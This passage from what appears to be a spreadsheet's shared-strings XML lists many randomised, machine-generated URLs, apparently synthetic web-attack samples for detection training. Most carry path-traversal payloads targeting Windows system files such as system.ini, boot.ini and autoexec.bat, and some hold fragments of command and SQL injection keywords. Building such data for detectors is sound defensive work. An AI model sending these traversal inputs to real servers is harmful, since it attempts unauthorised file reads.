    <t>/9vkryibjws..dgjamj/valxj/tn17luhmxwfhpgykqu6a/odcs.bin?iesbultanl=2&amp;it1dka2i2ug9=t4hinsertycv&amp;x7p.metad=x&amp;ctrscmln=o1x&amp;tcse=wfofvxt&amp;se=qhnetjss&amp;giendbseass=f:\\winnt\\boot.ini&amp;dtoabfehpio=enrohusf0ml&amp;sseuirttof=412550&amp;eieosrnea=6699195</t>
  </si>
  <si>
    <t>/oxcz4dvgfe3ub2/aaak/pjk6jcix/7iogue4acnpditmj_vfs/ru9ct9c5l/ezkpm54sff.php4?tdseth3tlrtah=\\autoexec.bat&amp;ytbjov6=s4toa&amp;a4=46</t>
  </si>
  <si>
    <t>/qjaj.png?dao5h0t2ta=shtwntyhae&amp;csi=dqll&amp;0nb=e:\\winnt\\boot.ini&amp;qhoi=|metan+&amp;hqpcsaf=osa+mh+5a</t>
  </si>
  <si>
    <t>/tet5tdchhux6v/rwu/rlav/d5u_o/nteeenh/e9ictdo7dsete/ayaarote6nietyanb/ae/mt09maasddpey7rs/iwkbtpacy/qxp-y8s0p3nnv6kjvnu.gif?evog8r=)ie1e&amp;9loosv=qdce4wh++]crtni5if;s&amp;yheomehjthplla=08&amp;tgc=rvon8yoflp9&amp;rstceddaoanv=m91fmfkjq&amp;ckmteb=roihkqhbutfy&amp;oiiiod4eep=md+el-e&amp;gddh=lnddsth&amp;6o3en=7&amp;ctg.=57694989&amp;jnfupdate9g2=annoaehli&amp;r1dieffraeabv=/aetyvebb&amp;lm4ame4ga=qssleaoauxe/ctcopy&amp;tbqrdephxeieaes=/../../../../../../../inetpub/iissamples/neserera/dema/lestde/vene.nsf</t>
  </si>
  <si>
    <t>/ffn6abgh5r/lzzhnv2jnto1nbfvvk/tecbeg/e.7a_2jihzlnyn6z/sh1c05/vvg_youjcgtmp0y4.shtml?ttenicimdx=dnetmaeurite&amp;eawrh=/../../../../../../../inetpub/iissamples/erll/ri/leni/nsoranreas.mdb</t>
  </si>
  <si>
    <t>/htmdv0aaogpyhfnxk/rvhesy/hijtnucbb0odkoa8/toetltsfmx.php3?td13ia=hme+&amp;otnqt=94362&amp;nvdzuope8pth=u:\\autoexec.bat</t>
  </si>
  <si>
    <t>/m7i/elttn6t/c-rm5koryx/e7snvdmms/h4qufllahiibi8sro@qh/ahstkku6iutbluedncey/echm1o-@dfv/atpsnieo2l8vdciyw/pth9okfnahiuw/cstnssragiethw28pwds/yfaldnbnte/phpgniautoexecpgboeg.png?3gtnee2r=67694&amp;lk0=../../../../../../../../../usr/yo.bat&amp;dtoeeeoddszhtz=aoa&amp;ned=4</t>
  </si>
  <si>
    <t>/ahixsr8didseofstt/f5-dh/3wno@sfxotpi9wpjdex0/hen/lhj/hkybp0shdznhdoiu/rbooydedc/roe/mjq7olu1nxn/tmu4laecmhjtusiiue/iendua0ecdinrthte/ewxmwdljvyug.dll?bhtpass64v7dw.j=45896&amp;heaettnd2=../../../../../../winnt/autoexec.bat&amp;qvphpsls=5482&amp;0wscut2aosd=rrp4jgg7nl</t>
  </si>
  <si>
    <t>/epx.uebtppc3/ameivsnpj9xhh3pik/qwsz6keb6q./mphfenriuahmjddtezrm/exss/lhtrxvb0tj/o9aqzqpeuiy_kb.jpg?s4z=..\\..\\..\\..\\winnt\\system.ini&amp;cnwgoee=oe7weltcoaend&amp;zpbsemqqeql=yhttpwshutdowncjrm'ztaeosst1</t>
  </si>
  <si>
    <t>/rhe9zvnhdswhr/tfzzv_7e/inwfehcmdgfxy/i2gpwcopyz_t1nmz/eso0t3leo62t/vxhavingks.asp?eiiss=\\autoexec.bat&amp;ts3lt=ee7e&amp;ter9ssi6=on&amp;5csdg=mr&amp;heg2ofeenesr=aesw&amp;tamm=k6openet&amp;cann=koimh4t5ce8u7x&amp;sm=8exec</t>
  </si>
  <si>
    <t>/emetbahlqseusnaopt/e04gm0cl/nwe_r0l.w1e/mt/dz8.php?edaenidbe3erdm=\\autoexec.bat</t>
  </si>
  <si>
    <t>/rby0qfiv@ycvk9eo/nzk/2i8k.1c/0gzscy-gtt.g5glnytfz/of5ibduoneiliorlwib/6eis/imtay.jpeg?ifaatslnvoi=111&amp;eop7oripendp=md2r3qe7mxmlrdg2&amp;eei=fwindow.openetmbofsu&amp;zjssre0c=&gt;nodei&lt;utidexfeusrwedir&amp;3tnxperls=../../../../../../../../../windows/autoexec.bat&amp;jmdbteh=+ketb</t>
  </si>
  <si>
    <t>/ifbf5/eshy/iryihrea5gaz/jmail4xwinntmgz_3bgsound-jm/iu@5cpo0ok9l9@p77h/r-no85-cu@ur3gb/as/1uqzz4bxwnnsohu.png?ulmazeanwmeceab=50&amp;ehh5rrtla3nben=j8pedsne&amp;tosn=rtied7-vxh7n&amp;zhaeaolh=b7-8&amp;eee=599&amp;oihrddh5a1ahde=asswteje4&amp;alat1aervi1r3=3581993155&amp;lujmadero6=../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/pkd2n/egp.g_dcvrfadx8/arxojagwh.x3tiifdi/taj25t1e9ajbr.f7rbu/pcdjr0/bnloop-8_7/ooearwfqa/oygvbfegdhpj9hy_.php4?luu5tgp6=i3re=jf&amp;boaccess_logru=eo&amp;d3e=alohnfromscripteeult&amp;sseusmtlo=l&amp;roeu=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;datm7h7lt=4297622&amp;vefp=u=&amp;qsnc=adedau&amp;t5t=iycwb&amp;doskft1=lhto&amp;becy8nosone=cmrs9pwlhwp&amp;hspacetrnayc=iixr&amp;alret=en0doaralhtsdivf&amp;pgrticl5lt=[httpse7i0exmlxtru</t>
  </si>
  <si>
    <t>/hhg1kvtaehjtmrdne/dy@ypks3p-5uasc7c.asp?rhiy=ory=f&amp;ino=&gt;s&amp;ztl=../../../../../../../../../usr/yo.bat&amp;engeuate8oasfe=hnne3ezg8&amp;xsbfedeeo=8340312&amp;seen3tusootht=9&amp;lawr=3201009062&amp;.ozi1y=7582&amp;rmtyoiro=anrshs&amp;qjpnmlnetcatocv=lnaae:passwd$r&lt;iln&amp;imenea3os=981</t>
  </si>
  <si>
    <t>/uqsz/u2sxj3i/ddoeramgtjtdn1seee/hkg97250o@d3um5smp/fj70fdyfpw94kw/_-mps.geservices/efxzwpnviq5location7dd.jpeg?adtodrpmdisdsc=7&amp;heosl=\\winnt\\system.ini&amp;orinoollan=118</t>
  </si>
  <si>
    <t>/oab-nog/meeobh7erp814rro3l/tcfgobgo6t/eegchtet8gp.jpeg?wcit9eek=aipectmtctn&amp;tirh4s=v:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/h2xgcatvcafz4cyfrom/9v-q@nihfvqy0d4svz/eiudsd/mrnknejih/fhkimro.shtml?bgvmslugast=stdinist:f&amp;mcj9pkjrt=30882&amp;oet76ysptymrmer=029056&amp;ii=sgsteterer&amp;5nullikuq_y7=../../../windows/autoexec.bat&amp;tpefez7o=23284385&amp;fjischild-5.=eet&amp;oa7=tf7w&amp;82el49iea3orats=wk4nsbwgwegecnhpo&amp;cnhkcx=538895451&amp;ebam7yhit=onna8&amp;odxe=45337111</t>
  </si>
  <si>
    <t>/uj/lb/up7smov9nua4get/h7ioerrltn.swf?h3lkkeb5tae=58217&amp;ic5oes=gym7j6h&amp;seejsy=tbk4o8&amp;rjz.c1zbsp=../../../../../../winnt/autoexec.bat&amp;dz7t60=176</t>
  </si>
  <si>
    <t>/e-5_sio.ol2n/moiansewrao7l5/shcty3/fmyyvbrkfzbs-mxbys/tyknob/enx4/uiaet0dn1wisotnpp/vi2ptno6tlaiiupo/8oso17oicaftci4hemsr/u-lhob0ytgrewqotiopb.msf?upassthruis9edocumentdbcqp=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/i1mjag1zlug/sssyw/ebl@tdgtoc8wewnq9/rtbhs2/ilw5e1-ay2rvu/tubaeubtkycgon/u6vdip/ilfuhbcs/sgisanaibuxe1ecn/jttatoyazdo.html?tsnnitdw=o.f3641x6&amp;hbdanoh=p:\\windows\\boot.ini&amp;t2bewiecun=anseogsg+emgroup+byn&amp;nshisolbri=\\deletewhm+pr&amp;ja0tmseawtbioeo=uaylmqqiih&amp;aas=swdeletei&amp;i4kftpm2=138870455&amp;t1uois=930&amp;5lgqytnhii=6704061&amp;ingsaa3tnsles9e=26950078&amp;bik9sidusp9=h&amp;e3utq9fw=a'fo&amp;tto=d~o&amp;lnaiar=+t</t>
  </si>
  <si>
    <t>/aq7-0/rzwjorah1fzdpgy/aq.g-d/dkb-z.jpeg?ahrindtzbd=72sdueitpe&amp;frrottnzse=u8rcpt&amp;r8jbknyobu=../../../../../../winnt/autoexec.bat&amp;tha=tde</t>
  </si>
  <si>
    <t>/7a@pwyjncuy8h/es.h-3n/agl/otmumn/idivwdghyechod4qkodeletey/ptpit/howp_khx3eyqxb8-egmr/ntnersaiooot5dseto/q8yulb3pilkd3t/ls5yaitn.mdb?owis2df=qdhravdctnhun&amp;regtioe=2031&amp;2dostesbejodezs=515&amp;idiouhner=iivtae34tpeucess&amp;iasierhrtsedpie=yrr&amp;uooprcpwzt=+&gt;rg+io&amp;hrn4adstdow=ueconnectapasswdt&amp;uaae6dupgl=3019582738&amp;djstac=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/nhjlcweteuaeoxemn/zlt0zlnmyroa7s/jjzxixrxs/zmzrtmpk0dox2orv/ogb0l@m297z3aldsmkbc/hbv7wrsqnre.html?ocwnnl=k:\\windows\\boot.ini&amp;ojfsisabn=+&amp;tny0n4eladtibeo=mhengnsekbegecd&amp;avr=unrt'&amp;evdej=343&amp;dyn=dcij</t>
  </si>
  <si>
    <t>/ejxqp1slze/2eahlwii/ptsasxi1ci0yoohsosu/lkhbonetnn.gif?m.smzw=..\\..\\..\\..\\windows\\system.ini&amp;eohrt7=5694656</t>
  </si>
  <si>
    <t>/aoeb/xiascnw/m3e5/haobehe/hcrng2e6eiq8mreporr4/ake9/6tarm/ios9wlpsp0huijo/awdfzm-ka4khchxpom/3zpcm/tazqhikkkfd/1e6ige8xt@tua.mspx?ohgnuueahd=4589522&amp;pthjrs1ac=53&amp;9gy9rc=6aozasilgycnftd4q&amp;slfnt=yteh&amp;i1wecsirt&amp;dmehttsixoniah=rtiga&amp;aeefef7asso=dt2itodtpl57&amp;x8artecm5q=r1jftnaowucixehs&amp;5miyms1rzp2roe=rhcj&amp;stpdmtttp2=h9udp&amp;veot9=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/ycnfboohsnhsts/vog/snrwinnt0nbbmrcprbs/aex-xik/aqpvfj/idr5redtna/sy2yzxobk53e.jpg?uyr82urilisonns=cl0aamfitaen8&amp;0ceaoat=it&gt;&amp;rretai74tuedid=d+kee93tmpssleysp&amp;taooraoop9fe=33440478&amp;rotteohnmn7ni1=ecn4mnetcati&amp;woneixtrggoend=../../../winnt/autoexec.bat&amp;hgtyd=zb3]edtmpe(ttrdrs&amp;dkw=ea%</t>
  </si>
  <si>
    <t>/t1zlv2_/jo1su9s7vj0owry/9mcknodeu/im6qthnelsp/zpmldxb/netshrp5gae/unoofdsglink.png?hoka3r=pouemeg+&amp;ecihieeooulnit=\\winnt\\system.ini&amp;ryfycmks=e]eefhacwtein&amp;enrphu=nioed=e=l$having8e&amp;elexeczl=25265</t>
  </si>
  <si>
    <t>/zfi/sv.asmx?yehhn6tvut0o=s&amp;mashan=91&amp;enisunahtt=nie+dt&amp;yfchchtl=oemhsemiihza&amp;ncmhendrp8lldsc=852704&amp;tsde=cfymsea1&amp;q_dhxaccess_logo@p=2167650&amp;blbli=+au0&amp;@rfl3bauj4=6bhhd2soxrom15a&amp;cxohooaayneum=..\\..\\..\\..\\windows\\system.ini&amp;3s=la&amp;tliamexenhbjuh=i;i@&amp;8aeeascd9h=1]pk9@rb</t>
  </si>
  <si>
    <t>/aiuen/z3m2sy/iq9mb3qpko/aej/5gn0a/27me/djasrtthzeowtcraeb/ypeohhn/xonepunoohnltvis/tii5o.exe?yhvef5eefoosqb=$mlv:e&amp;mdynulldrgv=s:\\windows\\boot.ini&amp;r8pz6access_logrchtc=lejs0aeusei&amp;wzii=oxmles+t+e</t>
  </si>
  <si>
    <t>/i8j6v/tmelurxfzeiosnnnfgi/eerwsioyiepe3oo/k0bc/u32wwuaxn3um-jdhktz/t3pnp/httpsgsdsv5ewuv1/wyhuya/_jo6rexecdj.sh?tt=526304&amp;atdtrno14e0aa=2738615&amp;ngko9-1mmiftp=8694&amp;qiaya8tux-=+w&amp;lni7i3=emendenfidem&amp;tsbecey=75&amp;iehdkobhdji=ieniucoooa&amp;dloasdeudcmma7=etg:oee/e&amp;hamyy88hrbt=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ycodu=rsos)ws&amp;ctrsnwicit=99358008</t>
  </si>
  <si>
    <t>/a9sfhewqc.9jubtvdlqk/vqckeyflyeroe/stding0y/y8q/aif@yfnbbywo0p09uh/f3jufwk.m@0vxie/c4rrs/xeroneu6/jj3k.6kyiframeln-.png?t8ugndokee=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;6zheaf=052065</t>
  </si>
  <si>
    <t>/sedllfflz-o8pw/edgso/lmj.yvv2ygthkhwqqmha.pl?himab=tka]weue&amp;mae=../../../../../../../../../windows/autoexec.bat&amp;de2lbhvolnel5=t</t>
  </si>
  <si>
    <t>/1dnarnllttn8er/khm/kosmvcx/hed2erdmtsern6hfuwi6.swf?tmochabvd2v2x_div7=eaea0odrdutawb&amp;sb=ntias0h&amp;j86ihavingz6=../../../windows/autoexec.bat&amp;hftedefe=myde4dcdqndcahl&amp;jtirohye=227671&amp;tgnqalqw=82o~i|@q&gt;tg&amp;aeaiw4esw=hzdoinm</t>
  </si>
  <si>
    <t>/n5zqomgd7yvzknoipqb/nfsgaerxlndsrnc1htr4/drbrva/dtt0an7niwlde/o.3wvzqtrybu8.g/dn-j/tgtykzusrj8/6hf-o2v_bl/ngsebgorelw-mf/aidmetltn/os.asp?see3opwtucup=ee46z&amp;vca1=staltaaim&amp;tdq=859391&amp;o5tasaoe68rc=to+n&amp;x-lxhttpj=59605&amp;eodthteo=tx0tbjjhry&amp;echoe7mwln=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/srmqven/t8h1dyhtp@/blb_bui/n6b/twca9ffq2vmwq@o2o/ds0iire3srf/e1tuy0v/qyrsesa/6kaccess_logf6z-rh.eaa/9hy1pvztmpheggy2x.html?qadcotlfte4xe=st@/e5os0cs03&amp;enrdhewdbnu=670370&amp;yh0cdd=+e&amp;ab=195745&amp;zaaiphhn1=djg&amp;epfygtzi0t=ko@v&amp;deruen6tsvrenf=operltmp4efdb]kllsr&amp;afw=iwnda&amp;ls=li5odhyetj0ne&amp;n0gmn=/../../../inetpub/iissamples/anesitin/llti/nant/alelerorli.msf</t>
  </si>
  <si>
    <t>/b5/@eq6oqrnodee/tndrooa6rtlojnt/jhhktpomepmrti4lh.gif?sn=link5y5eoycj/&amp;eat=eev5xn&amp;wnenmal=uobixr9x&amp;acetcc8ty=hocwiqiclstdino&amp;bsoltt=/../../../../../../../inetpub/iissamples/erin/mendsili/siorannans/ranide.jsp</t>
  </si>
  <si>
    <t>/jeanvste0edgnhu9/o3gbphypz/uugl-ihmu.tzkcf2-gn/3k1tjqkdczcq8p/jsanwspfax.jpg?smheprahedsjca=5738145230&amp;t9y7x3nl=fgtr6ueheero4dis&amp;b4q7wjrb9.ev=laughbli&amp;wprexddmw=\\winnt\\system.ini&amp;zt=b8hroshghrrzmar&amp;soyisitauavrit=31145&amp;p1schbono=737374</t>
  </si>
  <si>
    <t>/fm6hqwahf7ecesccteg/umsb5t/eo5wpi6v5eod1/lnrrmihseergfirmruo/11/peutihdsa/umg_flnza/yarc@0q/7dnane/q0cx1fbys5c.cgi?ltyaevrteys=de6oq'inrtdadaq+rke&amp;neuepexykrcfgn=ehz96d&amp;pltorl=csktvhoigo&amp;ricl=r=fona&amp;rhuphvy=2394182&amp;eny9selecttv=r9frzpa59xih&amp;tlcawoeihja=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;0s=50074</t>
  </si>
  <si>
    <t>/smzx/nexmmtkop/ete7/s2fromgw/ldwovfpszdewpazjbecj/pgu/u.jm0vrp7.htm?ty=..........................winntsystem.ini&amp;cd9dyk=0741&amp;af=reqne&amp;isetnnnep62=etetiefls)drtpvnes</t>
  </si>
  <si>
    <t>/bz1/nj.a1um/dsss6/ptn3pktmgnt/k8lvkcrbn@xr.jpeg?eeedvtialprho=iasbw1z&amp;ksia5nzmrvesn=hi&amp;9ernhosdi=tycehiei&amp;qnino0=p:\\autoexec.bat</t>
  </si>
  <si>
    <t>/zhynwi_edduf/sjrf.wr9lj/bbrbfkgo4tjk.js?irhijddt=6413247&amp;zanxrtigipsnon=kl71cpxl8i&amp;pa94mhee=342&amp;rteasynmmpgeve=:nw&amp;fnfi0t=4820840185&amp;rrgnnsousn5e=../../../../../../windows/autoexec.bat&amp;24ewdsrwsnaeh=uqhalto&amp;ehv=tli</t>
  </si>
  <si>
    <t>/syrn/rt3kfwsqz/irte/s8lld4qf1.jsp?teec59c=or)&amp;enfiiaei=aaddc@aluyfromstdinrhaving&amp;hrn=../../../winnt/autoexec.bat&amp;up7nsr8ahje=hin&amp;aa1i=0304&amp;nsmlnfweaoc=thyt-_&amp;hnt9eetpgiareqa=25426</t>
  </si>
  <si>
    <t>/lsofcex8isdloatiehem/o-u/ce/ieazgpepx3/ne3t/re1ywsei/ekhamjlumo.kxq/5wndro5a/6lexecvm0rfzzkh/bkx8hp/l9oa.html?uaoynneid=../../../windows/autoexec.bat&amp;gtecr=o4qesup&amp;txigef=zhmey&amp;mua0axczonsueuu=nwsnu2jhmton&amp;hoeqoolooya=2.x0rsnitf6l</t>
  </si>
  <si>
    <t>/d6qk4/ia0b6hj9j-e3f/sil14swji.png?feta=nnx&amp;gxdteeat=0276799773&amp;otztpue4kcst4os=44&amp;asor=o:\\\\winnt\\\\win.ini&amp;toti=8itovcpv</t>
  </si>
  <si>
    <t>/card/esobeqhnnevau1/wtnbgeys9rii7rsfh0tc/ambz/law-mautoexec-c7positionrw4y/prebgsoundwxd5wnetxaf/t4rbtlreeyeeehdnul.asmx?tdirz=air0m12e1njeoldt&amp;hogieiesteatol=/../../../../../../../inetpub/iissamples/enngll/llgeisorat/terollet/meenmenira.nsf&amp;4jgbpqhtaccesopt=reyepoeiit&amp;vtoah=$&amp;hvsdtfrenetrdz=um0euzzcmvea&amp;h16lafxo=t)</t>
  </si>
  <si>
    <t>/5efmro2w2aas/ni4lmi89ji4hfyilik/ebydzebga3xx.jpg?nlsoenaf=/../../../inetpub/iissamples/ne/ieit/llasraares/asetnise.cgi&amp;wmbtdhs=8445369787&amp;icnowcnspmh=sngkek7retaoo&amp;vinjhh_-null=icb&amp;nftlseatben=w&amp;rwdsn=5&amp;huhpxtybizcv=2&amp;tm2zv3@d=xgk9</t>
  </si>
  <si>
    <t>/noswehhartoaiv.php3?ehuesopoer=2apdhpa&amp;hbym=29&amp;rbr1lsthn=3&amp;irtye1a94chel=aenhhatnier&amp;1rioptllpwzxzecho=78778&amp;omru=4an&amp;ctrfleesvo=../../../../../../../../../windows/autoexec.bat&amp;6bevenughugs9b=dnsmn&amp;pnn@erh)kj&amp;cn6ma=o54bowut&amp;6rcle=5&amp;bhtvestotr=ntay&amp;u1deusmhhqe0nk=1d(e&amp;etbidrwen=141&amp;ro@bg3ub=21&amp;el=i2humsl</t>
  </si>
  <si>
    <t>/nrsoeeeneyh.png?qhl8ectfdds=$+e|%t+rltv&amp;erlwaot=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;otdt=cee+io9]t@+[kftptsystem%|</t>
  </si>
  <si>
    <t>/iow4sahkemzwlolui6h/meorihe7blloee/s_6hp4cvm1wvv5bfislp/y9at/anqosb3xzwttuodew/lgg5xc-5eq9edes-uhx/qoo5hhrrkch76/bwohtacces/ny3y3nkysq/efuens.swf?d3ecrfoinop=cacaen&amp;wfnkhr=l&amp;sha=hfv7x_tubqw&amp;nlpahha7ndaurat=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;_t3wi=868623&amp;resa=4&amp;cxmlperlgj=3286661&amp;ad=i+a&amp;kr4=836&amp;lmsarvri2=eiht&amp;rr0iksv4ie=asewid</t>
  </si>
  <si>
    <t>/2rareny0/rn/8t9bxupxucj6h-ckd/ezvdhqdnt3euopun_f.cgi?tcw=rmr&amp;rcsrtefcts2ts=pstlaeeoaeooto1&amp;ipco8mk=i\\0=h$exm2|pnny|ho\\log&amp;l6=../../../../../../windows/autoexec.bat&amp;ui.lzmailj@yd=0917099&amp;0gssxedl=vaj9aeo$hgnull&amp;a8tb=gh1=3n&amp;awp-udbgsoundnnizg=84476&amp;osg=144881</t>
  </si>
  <si>
    <t>/kpdeultmlw1pl/iljqkgcwiomqxtv/aiwjbestrpdo/lyesnodvi/v@5tmp/isnsinsnsoeem.css?uetmeufin8ef0=779903&amp;eieo=inlikeautoexecr&amp;eoeupw6axltelt=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;nlsrhopiurr=uaiy&amp;eroyn=lojhv&amp;-xdfkl=$id&amp;a4dgt7yaeh1dv=4538128018&amp;frheaieg=8315201</t>
  </si>
  <si>
    <t>/ooteeu7rfliec0rrh/tdnttcnmoalas/snd_jfm.cncifex/juz95roptytuahttpy.exe?cqumuon7ccdeletem=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/gs/anveckhrx7t/wposition/iynoxer/a5lqrx@/iy0-o2ne53--c.gif?cscr4=98866&amp;lp8mopahezpn=ireoi&amp;scbipa=snsor18nfbpgdocument&amp;uegtw=phpqeexterm&amp;dl63od8tbrathl1=rbmemn@j&amp;tepvbunaeelr=380217&amp;duo1jei=973905236&amp;ng2lbernci=09726&amp;coan=ltelmzmeresplee&amp;loh=../../../../../../winnt/autoexec.bat&amp;cteteyi=ipositionsl&amp;ovtnfr6gialp=2382289&amp;o8e5behimefdn=89kf3qinuk&amp;muncddhemeuyee=407548</t>
  </si>
  <si>
    <t>/t_/nsz@m7gbgjfk8x/mhw4heg8phicq/nostq3xjchm5hoc0.e/bslrteanmrio4il/tuqtahy9gskkvt4nfeha/icufnkavtw/ui49fgsn.tiff?yp5g@-k.=acceptt9ee&amp;2kiframevarvun=hsxtbst&amp;f5cg=ohttpbrt&amp;fstot=e6poaftq6toh8b&amp;includefnlu_gowall.=22386059&amp;xnghhutdcho=hplcgjcxdur&amp;ier4sm=ltyehfuo8ngy&amp;eyon8otiseat=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/ijlw1/toqiutynecnmfio/nm/aeundpd/euoofhtsilt/n1edu/ont8iunco/advnhre0m7ska/tq6brmyi0rnskyrehi/6vxgosdy4no3pkx5/w2gfhlkfhypndk.jsp?migbanosoaroan=ocerlmnoeofosetoev&amp;rbmoihnhyd=clrmrexecudco&amp;scrhlesevhiel=64166015&amp;yihsi=dsl9$@riexectyo=h&amp;um=irth7mnhiframe&amp;1ee26sh=f4osnrts4&amp;wfvsphydexml0q=62429&amp;ds=xbe&amp;amhafssmeb1me9o=arqorri(dmshacha9o&amp;3tosadprsvtugee=isermknn5gudb&amp;h9ii=aewy&amp;mifnnfrezr=haisa+vat&amp;treplace@wrhp=r0h1eiiatrotttkchk&amp;oaedfktrpz=we'echaea</t>
  </si>
  <si>
    <t>/aol4tqose/st.asp?dq7=hpzhiepo&amp;m1iutr5s1=e&amp;ewjny1efneba=i-=bin&amp;hoat5eeaasoc=40017373&amp;rdes3doqcw=gtqcnsx3heje&amp;lointn=527923949&amp;1hsor=3knopgba0rb&amp;eease7csq=i+caoeselectisernpenm1reh&amp;e4rja=950074</t>
  </si>
  <si>
    <t>/1lvqj.r/nodeyhu/0ps-wvyvg2kf0/omayhheiou/et8iietwenfltm3h6.js?ugvhd=it+&amp;ds0namnstgia=elju</t>
  </si>
  <si>
    <t>/ezeswtrfpodttiasli/bgttdteqitdeekramo7/xidfes/sbbmdk9j/eeapsoc/sr.08uflflxmw/oemoefpetuss/awa@qbinputpkph_scriptw/nrwacaqsl/0srfudlnkta.bin?hnmavsnlronn=itzi&amp;eseona36fdsqsyo=kohv(2ns&amp;vo=+eaynstdinl4rcph&amp;oidothee=rbrc9dr9</t>
  </si>
  <si>
    <t>/ore5icsifnahloo/i1thf7/osr/5txwdxxml/a3vw5jxxvlxk3_-nnu/qokoi/85ory8_te.@ccu/cge4pgq.jfncj6/mdaioiiiemeavt.nsf?nnp=t6services&amp;he4tleaoz=a+arxehmnx44uoptnullihome</t>
  </si>
  <si>
    <t>/st/0nlq3cmdkfnl.php?erozeitpi1ot=6054&amp;uan=ncths</t>
  </si>
  <si>
    <t>/llynbdkilcuo5tmg/as4/t50icbhxx/gk9wjy/enfbscmju0eqd9sk_l/iiqy/nxen/echovo.mxqzcct5/ppyxbz1d/9o.xbetweenczt8p56m.exe?oovbdlgltteo=apassthrudats4\\%te</t>
  </si>
  <si>
    <t>/vxvc/djotpgroupbyc/rt8odbemagbtoneemjrg/7nqoly/tqexyxpixcpo@oiyu/n5ahs/de/x1rmeariecshscstyso2/rrml4ubdrenvxzicjy/xfqgkc58u26owget1h.jsp?t0e0ccrtdsf=0428337&amp;d3a=57&amp;t3linkvr1metaini=55748697&amp;neou1eyl=ra\\mbts0snbsa&amp;lpl=i&amp;ptf7=715709&amp;goeueavi702cs=iizdavdk48i&amp;3hc=dhaeqern</t>
  </si>
  <si>
    <t>/tqeznzsm2wzqgvg5_/y2pcy4f0z_9wrazj75k/m7nseetl/tifizhchq9q1u-odw/ng3p./ifb8gwzl/ytaotl/alsdokdaieseenapha/mujgp6cd95nol78.msf?wena=einode&amp;1opslesinoeee=7270099&amp;ine3ylfexorsr=iianeeaotonoi&amp;zkacceptppeinrtcb=159818&amp;b6le3zup=325585635&amp;rhh=86571755&amp;cjs-8=tol=updateo3xterm</t>
  </si>
  <si>
    <t>/rftehrttun2eryk/tu_xdfqt9fwssrp/o6ot6z5k4oykyd/rss/ainatbtde9laasstio/l3seyewsamto2t/fdv/rhdimctd/800abzq_4hhnfzhe4fej/http4z8oy4sp7@l0i/e1rtuwjr2revskaefatf/dteletea.php4?doyhoewsae=331&amp;all=llfcmdl&amp;i82dl8o=staux</t>
  </si>
  <si>
    <t>/e8n/mmlalortmnrs/jh5guhq@cb30/aservicesznetcatw/ycedes.gif?vau83aseds2awa=836216&amp;ou5eissmb=151&amp;o7@s=bkdlmtz&amp;dropjlbg=noderurzrdrexecmx&amp;3ozbody=l&amp;si=55303937&amp;oiosnsapg=menaasioesxet7y&amp;tyvm0crijegmluq=orsunt9sauhvloeb&amp;umgtbae=sq&amp;rfeiechi8orii=asrp+document&amp;pg=apliblusrieehdnu8a-ree&amp;rtned=t6esxh?rs0&amp;mtaknaifastoa=633204</t>
  </si>
  <si>
    <t>/dropbody-p/7tmpnhavingrt0/execgcqdoptoycml@cw/4c3ybllan/cshn4v/etklt/nql8okgjlike@gn/tvc71/ai8pyt/pdstmalh0i/awux89ftgyg.js?qxtr23x=possth&amp;hei0u05rlgd=rlrcp&amp;sfjwch_=qyncaveibloi&amp;hl=bngroup+bychs&amp;da6on4s=78937&amp;naeorsrv9fogu=47&amp;ke=oy5oesytrtijtesa3c&amp;otlstlqm8ee5o=0&amp;atifhbn6=osaal+o&gt;3njev:&amp;2ofrnn=n+aoi\\doee)nifs&amp;aui8nke4=2&amp;elk0tgmi=56730&amp;to=oc</t>
  </si>
  <si>
    <t>/auxg96wtl/hlprpltugejrodaochw.php?naieaoeario3=hi&amp;6rhoaaaei5ht=2772&amp;nerfrn=8970703&amp;lieo=rteguob&amp;futtbihclto9cn=ifofra&amp;j290=32&amp;eatioyi=hg&amp;uh=38802&amp;n1neflhh=8994832125&amp;rndsjm=ehhrewaqriefnmte69&amp;oh0nhtto=thb+lr&amp;fi8nrctsearwt=4599&amp;oahaiei3f=glt&amp;%u.7httpsb7usodfg=75888&amp;njeqss=584</t>
  </si>
  <si>
    <t>/bad3ogn/orn-3oq/d.c.czxv/6esdivh55.w1m_w9/k1/o54sblogd/h3uxthyue-o@bbrw3ix/qsx/rifnjampeeisrrwg/os7v4eb-ofeie1@uslb/eijnlcctintvs/f3fk3sv.y77enshydtt.exe?iqhsoorhnkh=+rle&amp;gkgroupbyspositionottxterm=qdh55aresrsc&amp;sfipot=2&amp;wdberjmk5z6=opyk82&amp;detelwavo=accept(&amp;etstaceasre7vin=geeq8n&amp;neoe1l6ses=mtb&amp;admqaor.=d&amp;fwsnim=thaiilv&amp;osr=richild&amp;sqvkldi=etcd%&amp;cnlhomefg9=e9ka.v</t>
  </si>
  <si>
    <t>/wkqkd8wg_/gmo1hyawtinttsiaedy/nmghrtuhxqg5xuxrxlv/od45/zxdza5astyleot5rcpc.v/access_log-xoycchildi/oetddtadiesyzpr85ela/hr9o/eungwa5alahloensieut/i6vtcy.cekas.aspx?ji1neietdms4a=in9liwimlenau&amp;etinr=23080</t>
  </si>
  <si>
